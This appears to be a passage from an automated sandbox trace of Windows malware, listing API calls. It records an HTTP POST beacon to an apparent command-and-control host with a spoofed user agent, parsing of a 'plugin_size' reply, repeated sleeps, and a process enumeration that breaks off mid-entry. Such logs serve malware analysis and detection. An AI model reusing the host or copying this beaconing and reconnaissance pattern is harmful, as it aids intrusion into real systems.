lpString2=",k2#fLx^rW6Gq/ri#sV/Y7;m2R2-ea&&l.g8\"=:1>1CvxOyrQ[mOvoo***jvIJQQFj`C>dBwB`>i!H(`IQN\"o9\"^OPd+v?KxC+x?w,glgYx+o3tes>z*D+x;G-QX'ELUu.G#BY79X,(Z!8*]9C\\[ddvuz1X_z'C@R5cJ4&E0^/,mR&g>RZ8'Zy0z1CvxOyrQ[mOvoo***jvIJQQFj`C>dBwB`>i!H(`IQN\"o9\"^OPd+v?KxC+x?w,glgYx+o3tes>z*D+x;G-QX'ELUu.G#BY79X,(Z!8*]9C\\[ddvuz1X_z'C@R5cJ4&E0^/,mR&g>RZ8'Zy0z1CvxOyrQ[mOvoo***jvIJQQFj`C>dBwB`>i!H(`IQN\"o9\"^OPd+v?KxC+x?w,glgYx+o3tes>z*D+x;G-QX'ELUu.G#BY79X,(Z!8*]9C\\[ddvuz1X_z'C@R5cJ4&E0^/,mR&g>RZ8'Zy0znSQ@c.DuPUKUpX@V" | out: lpString1="%[+$q!>.LE<`q7;Y71?>NOxx1f?QV4VtYG+&&)V':7uY(h.inizlzJrwALrEumd')ckvO6]\\u/.34hV/XGkf9nSQ@c.DuPUKUpX@V") returned="%[+$q!>.LE<`q7;Y71?>NOxx1f?QV4VtYG+&&)V':7uY(h.inizlzJrwALrEumd')ckvO6]\\u/.34hV/XGkf9nSQ@c.DuPUKUpX@V" [0294.490] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10c) returned 0x4a31b00 [0294.490] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0294.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4a31840, cbMultiByte=28, lpWideCharStr=0x4a31b00, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0294.490] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x101efc18 | out: pProxyConfig=0x101efc18) returned 1 [0294.565] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa1b2580 [0294.593] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x101efcd0 | out: lpUrlComponents=0x101efcd0) returned 1 [0294.593] WinHttpConnect (hSession=0xa1b2580, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa273e30 [0294.594] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31c20 [0294.594] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x68) returned 0x4a31c40 [0294.594] WinHttpOpenRequest (hConnect=0xa273e30, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa1a0ad0 [0294.595] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x4e) returned 0x4a31cb0 [0294.595] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10d) returned 0x4a31d10 [0294.595] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6a5b66a9 [0294.595] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31e30 [0294.595] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x17) returned 0x4a31e50 [0294.595] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa61bc0 [0294.595] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x86175062 [0294.596] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xaae5c42e [0294.596] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x15cf1de [0294.596] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8a7a1feb [0294.596] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb25498ef [0294.596] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x323be5ce [0294.596] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfad4c11e [0294.596] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4fcfea90 [0294.596] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2fd312b0 [0294.596] wsprintfW (in: param_1=0x4a31d10, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://alvvxeuoh.com/") returned 43 [0294.596] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31e50) returned 0x17 [0294.596] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31e50) returned 1 [0294.596] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31e30) returned 0x12 [0294.596] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31e30) returned 1 [0294.596] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31cb0) returned 0x4e [0294.597] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31cb0) returned 1 [0294.597] WinHttpAddRequestHeaders (hRequest=0xa1a0ad0, pwszHeaders="Accept: */*\r\nReferer: http://alvvxeuoh.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0294.597] WinHttpSendRequest (hRequest=0xa1a0ad0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x4a319b0*, dwOptionalLength=0x13e, dwTotalLength=0x13e, dwContext=0x0) returned 1 [0296.011] WinHttpReceiveResponse (hRequest=0xa1a0ad0, lpReserved=0x0) returned 1 [0296.011] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x2800) returned 0x4a31e30 [0296.011] WinHttpReadData (in: hRequest=0xa1a0ad0, lpBuffer=0x4a31e30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efd88 | out: lpBuffer=0x4a31e30*, lpdwNumberOfBytesRead=0x101efd88*=0x18) returned 1 [0296.011] RtlReAllocateHeap (Heap=0x4a30000, Flags=0x8, Ptr=0x4a31e30, Size=0x5000) returned 0x4a31e30 [0296.012] WinHttpReadData (in: hRequest=0xa1a0ad0, lpBuffer=0x4a31e48, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efd88 | out: lpBuffer=0x4a31e48*, lpdwNumberOfBytesRead=0x101efd88*=0x0) returned 1 [0296.012] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0296.015] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31e30) returned 1 [0296.015] WinHttpCloseHandle (hInternet=0xa1a0ad0) returned 1 [0296.015] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31d10) returned 0x10d [0296.015] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31d10) returned 1 [0296.015] WinHttpCloseHandle (hInternet=0xa273e30) returned 1 [0296.015] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31c40) returned 0x68 [0296.015] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31c40) returned 1 [0296.016] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31c20) returned 0x12 [0296.016] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31c20) returned 1 [0296.017] WinHttpCloseHandle (hInternet=0xa1b2580) returned 1 [0296.017] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31b00) returned 0x10c [0296.017] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31b00) returned 1 [0296.018] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a318b0) returned 0xf8 [0296.018] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a318b0) returned 1 [0296.018] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a319b0) returned 0x147 [0296.018] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a319b0) returned 1 [0296.019] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0296.019] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x15) returned 0x4a318b0 [0296.020] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0296.020] lstrlenA (lpString="plugin_size") returned 11 [0296.020] atoi (_Str="0") returned 0 [0296.020] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0296.020] lstrlenA (lpString="|:|") returned 3 [0296.020] MapViewOfFile (hFileMappingObject=0x229c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x58e0000 [0296.028] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0296.029] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x58e0000) returned 0x0 [0296.053] atoi (_Str="0") returned 0 [0296.053] VirtualFree (lpAddress=0x1e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0296.054] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x24 [0296.055] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0296.055] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0296.055] Sleep (dwMilliseconds=0x258) [0296.136] Sleep (dwMilliseconds=0x258) [0296.231] Sleep (dwMilliseconds=0x258) [0296.324] Sleep (dwMilliseconds=0x258) [0296.497] Sleep (dwMilliseconds=0x258) [0296.600] Sleep (dwMilliseconds=0x258) [0296.686] Sleep (dwMilliseconds=0x258) [0296.767] Sleep (dwMilliseconds=0x258) [0296.786] Sleep (dwMilliseconds=0x258) [0296.795] Sleep (dwMilliseconds=0x258) [0296.857] Sleep (dwMilliseconds=0x258) [0296.905] Sleep (dwMilliseconds=0x258) [0297.036] Sleep (dwMilliseconds=0x258) [0297.137] Sleep (dwMilliseconds=0x258) [0297.317] Sleep (dwMilliseconds=0x258) [0297.478] Sleep (dwMilliseconds=0x258) [0297.587] Sleep (dwMilliseconds=0x258) [0297.743] Sleep (dwMilliseconds=0x258) [0297.893] Sleep (dwMilliseconds=0x258) [0298.024] Sleep (dwMilliseconds=0x258) [0298.214] Sleep (dwMilliseconds=0x258) [0298.406] Sleep (dwMilliseconds=0x258) [0298.512] Sleep (dwMilliseconds=0x258) [0298.605] Sleep (dwMilliseconds=0x258) [0298.688] Sleep (dwMilliseconds=0x258) [0298.701] Sleep (dwMilliseconds=0x258) [0298.719] Sleep (dwMilliseconds=0x258) [0298.788] Sleep (dwMilliseconds=0x258) [0298.888] Sleep (dwMilliseconds=0x258) [0298.951] Sleep (dwMilliseconds=0x258) [0299.047] Sleep (dwMilliseconds=0x258) [0299.126] Sleep (dwMilliseconds=0x258) [0299.172] Sleep (dwMilliseconds=0x258) [0299.234] Sleep (dwMilliseconds=0x258) [0299.280] Sleep (dwMilliseconds=0x258) [0299.339] Sleep (dwMilliseconds=0x258) [0299.452] Sleep (dwMilliseconds=0x258) [0299.505] Sleep (dwMilliseconds=0x258) [0299.563] Sleep (dwMilliseconds=0x258) [0299.670] Sleep (dwMilliseconds=0x258) [0299.766] Sleep (dwMilliseconds=0x258) [0299.932] Sleep (dwMilliseconds=0x258) [0300.052] Sleep (dwMilliseconds=0x258) [0300.134] Sleep (dwMilliseconds=0x258) [0300.222] Sleep (dwMilliseconds=0x258) [0300.346] Sleep (dwMilliseconds=0x258) [0300.374] Sleep (dwMilliseconds=0x258) [0300.423] Sleep (dwMilliseconds=0x258) [0300.449] Sleep (dwMilliseconds=0x258) [0300.516] Sleep (dwMilliseconds=0x258) [0300.560] Sleep (dwMilliseconds=0x258) [0300.640] Sleep (dwMilliseconds=0x258) [0300.693] Sleep (dwMilliseconds=0x258) [0300.739] Sleep (dwMilliseconds=0x258) [0300.815] Sleep (dwMilliseconds=0x258) [0300.880] Sleep (dwMilliseconds=0x258) [0300.915] Sleep (dwMilliseconds=0x258) [0300.955] Sleep (dwMilliseconds=0x258) [0300.968] Sleep (dwMilliseconds=0x258) [0301.021] Sleep (dwMilliseconds=0x258) [0301.075] Sleep (dwMilliseconds=0x258) [0301.198] Sleep (dwMilliseconds=0x258) [0301.249] Sleep (dwMilliseconds=0x258) [0301.297] Sleep (dwMilliseconds=0x258) [0301.349] Sleep (dwMilliseconds=0x258) [0301.420] Sleep (dwMilliseconds=0x258) [0301.467] Sleep (dwMilliseconds=0x258) [0301.533] Sleep (dwMilliseconds=0x258) [0301.585] Sleep (dwMilliseconds=0x258) [0301.628] Sleep (dwMilliseconds=0x258) [0301.698] Sleep (dwMilliseconds=0x258) [0301.759] Sleep (dwMilliseconds=0x258) [0301.765] Sleep (dwMilliseconds=0x258) [0301.810] Sleep (dwMilliseconds=0x258) [0301.855] Sleep (dwMilliseconds=0x258) [0302.851] Sleep (dwMilliseconds=0x258) [0302.919] Sleep (dwMilliseconds=0x258) [0302.966] Sleep (dwMilliseconds=0x258) [0303.154] Sleep (dwMilliseconds=0x258) [0303.264] Sleep (dwMilliseconds=0x258) [0303.814] Sleep (dwMilliseconds=0x258) [0303.932] Sleep (dwMilliseconds=0x258) [0303.990] Sleep (dwMilliseconds=0x258) [0304.051] Sleep (dwMilliseconds=0x258) [0304.209] Sleep (dwMilliseconds=0x258) [0304.323] Sleep (dwMilliseconds=0x258) [0304.419] Sleep (dwMilliseconds=0x258) [0304.511] Sleep (dwMilliseconds=0x258) [0304.583] Sleep (dwMilliseconds=0x258) [0304.653] Sleep (dwMilliseconds=0x258) [0304.700] Sleep (dwMilliseconds=0x258) [0304.864] Sleep (dwMilliseconds=0x258) Thread: id = 49 os_tid = 0x13b8 [0105.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0105.577] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.578] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.579] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.581] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.582] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.584] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.585] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.586] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.588] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.589] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.591] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.592] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.593] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.595] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.597] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.598] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.599] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.601] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.602] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.603] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.605] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0105.622] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.624] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0105.625] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.627] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.628] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0105.629] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0105.631] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0105.632] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0105.633] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.634] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.636] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0105.637] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0105.638] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0105.640] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0105.641] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0105.642] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0105.644] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0105.645] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0105.646] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0105.648] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0105.649] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, 